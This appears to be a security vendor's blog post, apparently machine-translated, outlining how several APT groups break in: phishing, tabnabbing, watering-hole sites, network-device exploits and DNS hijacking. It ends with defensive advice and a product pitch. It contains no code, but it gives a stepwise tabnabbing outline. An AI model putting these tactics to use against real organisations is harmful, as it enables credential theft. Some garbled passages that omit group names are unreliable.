Hacking of computer systems can occur in different ways – from sophisticated attacks with hacking of network components to technically primitive techniques such as compromising business correspondence. In this post, we will analyze tactics that use the most dangerous hacker groups – Lazarus, Pawn Storm, Cobalt, Silence and MoneyTaker .
One of the most important criteria for choosing hacker tools, in addition to the degree of ownership of group members by them, is effectiveness. Modern cyber attacks are complex multi-stage operations, the implementation of which requires a lot of time and serious financial resources. If penetration into the system fails, all the preliminary work and costs will be in vain. Thus, penetration tactics in systems that are used by leading groups can be considered as the most effective.
Among these tactics should be highlighted:
- All types of phishing – classic, targeted, phishing through social networks, tabnabbing;
- Supply chain attacks;
- Attacks like Watering Hole;
- Attacks through vulnerabilities of network equipment and operating systems;
- Attacks through DNS interception.
In fact, all these methods have long been known, but each group brings its own “twist”, turning just effective tactics into an armor-piercing projectile or gracefully combining several techniques to easily bypass the protection systems of companies.
In its simplest form, phishing is a regular email containing a malicious attachment or link. The text of the letter is composed in such a way as to convince the recipient to perform the actions necessary for the sender: open the attachment or follow the link to change the password.
Letters sent by colleagues or managers are more credible than messages from strangers, especially if the design of the letter is consistent with the style adopted by the company. In this regard, the preparatory phase of a cyber campaign using phishing necessarily includes collecting information about the structure of the organization, a list of employees and their emails, as well as real letters containing design elements.
It uses the most common phishing for penetration with a slight nuance: its campaigns necessarily include a test phase with the sending of harmless emails to check the relevance of the collected address database. This allows you to increase the effectiveness of the attack by sending letters with malicious load to the verified recipient database.
The Pawn Storm group also uses phishing mailings, and an influence amplifier such as authority is added to increase their effectiveness. In this regard, the preparatory phase of their campaign includes the so-called High-Credential Phishing – the theft of high-level accounts. Having collected a sufficient amount of such data on the target organization, Pawn Storm carries out mailing on behalf of these persons, “charging” them with a payload that ensures the successful achievement of the goal.
In the arsenal of Fancy Bear tricks there is another, not too well-known, one – replacing a legal site with a phishing site in browser tabs – tabnabbing , described by Aza Raskin from Mozilla in 2010. The tabnabbing attack is as follows:
- the victim is lured to a harmless site that is controlled by an attacker;
- there is a script on the site that monitors the victim’s behavior: as soon as she switches to another tab or for a long time does not perform actions, the content of the site changes to the authorization page in the mail or social network, and the favicon of the site to the favicon of the corresponding service – Gmail, Facebook, etc.
- Returning to the tab, the victim discovers that she has “logged in” and without a doubt enters her credentials;
- the script passes the login and password to the attacker, and then redirects the victim to the appropriate service, which he did not think to log out to anyone.
Lazarus hackers do not trade for trifles, preferring to hit exactly on target. Their weapons are targeted phishing by mail and social networks. Having chosen an employee of the company suitable for their tasks, they study his profiles in social networks, and then enter into correspondence with him, which usually begins with an attractive offer of a new job. Using social engineering, they convince him, under the guise of something important, to download the malware and run it on their computer.
The MoneyTaker team , which specializes in banks, conducts phishing campaigns on behalf of other banks, the central bank, the ministry of finance and other financial-related organizations. By copying the templates of the relevant departments, they give the letters the necessary and sufficient degree of credibility for a successful attack.
Watering Hole Attack
Watering Hole, or Watering Hole, is one of Lazarus’s favorite tactics. The meaning of the attack is to compromise the legal sites that are often visited by employees of the target organization. For example, for bank employees, such resources would be the central bank’s website, ministries of finance, and industry portals. After hacking, hacking tools are placed on the site under the guise of useful content. Visitors download these programs to their computers and provide attackers with access to the network.
Among the hacked Lazarus sites are the Polish Financial Supervision Commission , the Bank of the Eastern Republic of Uruguay, and the National Banking and Stock Commission of Mexico . Hackers used vulnerabilities in Liferay and JBoss to hack sites.
OS and network hardware vulnerabilities
Exploiting vulnerabilities of operating systems and network equipment provides significant advantages, but this requires professional knowledge and skills. The use of exploit kits without a deep understanding of the principles of their work will quickly nullify the success of the attack: they hacked into a hack, but could not do anything.
Vulnerability attacks are common for MoneyTaker, Lazarus, and Pawn Storm. The first two groups mainly use the known errors in the firmware of network equipment to introduce their server into the company’s network through a VPN, through which they carry out further actions. But in the arsenal of Pawn Storm, dangerous zero-day vulnerabilities are discovered, for which there are no patches; it scans for systems with known vulnerabilities.
This is a family of attacks we recorded only with Pawn Storm. Other well-known groups are usually limited to phishing and two to three alternative methods.
Pawn Storm uses several levels of DNS compromise. For example, there are cases when they stole company credentials from the DNS control panel and changed MX servers to their own, gaining full access to correspondence. The malicious server received and transmitted all the mail to the target company, leaving copies in it, and hackers could infiltrate any chain at any time and achieve the desired result, undetected.
Another way of compromising was to take complete control of the DNS registrar’s servers. In many countries there is only a very small number of registrars, so the seizure of control over the largest of them provided almost endless possibilities for introducing most public and private organizations into the information exchange, phishing and other types of influence.
Phishing is not only popular with script kiddis renting access to malicious services such as Phishing-as-Service or Extortion-as-Service. The effectiveness and relative cheapness of this method made it the main, and sometimes the only weapon of the most dangerous groups. The wealth of options for using it plays into the hands of criminals: before compromising business correspondence, most of the protective solutions pass, and the credulity and distraction of users will remain a reliable support for fraudulent attacks.
Protecting computer systems and network equipment is undoubtedly an important task along with the timely installation of security updates, but taking into account the charts of cybercrime tactics, measures related to protection from the human factor come first.
Intercepted credentials from a senior person’s mail will allow criminals to steal sensitive information of special importance, and then use this mail and information to conduct a multi-pass attack. Meanwhile, banal training of skills and the use of MFA would deprive hackers of this opportunity.
However, defense systems also do not stand still, detecting malicious actions using artificial intelligence, deep learning and neural networks. Many companies carry out the development of this class, and we also offer our customers to protect themselves from sophisticated BEC attacks with the help of specially trained artificial intelligence. Their use in conjunction with training employees in safe behavior skills will allow them to successfully resist cyber attacks by even the most technically trained groups.